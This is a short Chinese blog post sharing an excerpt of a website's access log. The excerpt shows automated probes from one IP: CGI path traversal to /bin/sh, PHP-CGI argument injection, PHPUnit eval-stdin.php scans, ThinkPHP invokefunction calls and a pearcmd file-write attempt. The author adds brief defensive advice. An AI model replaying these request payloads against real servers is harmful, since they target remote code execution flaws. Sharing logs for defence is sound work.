今天查看了一下网站的访问日志,发现其中有较多针对 PHP 网站的攻击请求,节选如下:
111.172.11.54 - - [24/Sep/2024:09:31:07 +0800] "POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" 400 163 "-" "-" "-"
111.172.11.54 - - [24/Sep/2024:09:31:12 +0800] "POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1" 400 163 "-" "-" "-"
111.172.11.54 - - [24/Sep/2024:09:31:15 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 301 175 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:22 +0800] "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 403 38 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:27 +0800] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 297 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:32 +0800] "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 289 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:37 +0800] "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 281 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:43 +0800] "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 273 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:48 +0800] "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1" 404 287 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:53 +0800] "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:31:59 +0800] "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 283 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:04 +0800] "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 275 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:10 +0800] "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 267 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:15 +0800] "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 259 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:20 +0800] "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 291 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:26 +0800] "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 283 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:32 +0800] "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 275 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:38 +0800] "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1" 404 267 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:43 +0800] "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:49 +0800] "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 313 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:32:55 +0800] "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:00 +0800] "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 303 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:06 +0800] "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:11 +0800] "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:16 +0800] "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:20 +0800] "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 303 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:25 +0800] "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:29 +0800] "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:33 +0800] "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 313 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:38 +0800] "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 401 0 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:42 +0800] "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:46 +0800] "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:49 +0800] "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:53 +0800] "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:55 +0800] "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:33:59 +0800] "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:06 +0800] "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 331 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:08 +0800] "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 309 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:11 +0800] "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 311 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:13 +0800] "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 307 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:16 +0800] "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 305 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:19 +0800] "GET /index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:22 +0800] "GET /public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:26 +0800] "GET /index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/<?echo(md5(\x22hi\x22));?>+/tmp/index1.php HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
111.172.11.54 - - [24/Sep/2024:09:34:30 +0800] "GET /index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 403 16 "-" "Custom-AsyncHttpClient" "-"
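将这些攻击日志放出来,供大家参考。从状态码看,节选中的请求返回的都是 301/400/401/403/404,没有一条是 200,这些探测在本站看起来均未成功。排查自己的日志时,可以重点关注同类路径(如 eval-stdin.php、invokefunction、pearcmd)是否出现过 200 响应,并确认 vendor 等开发依赖目录没有暴露在 Web 根目录下。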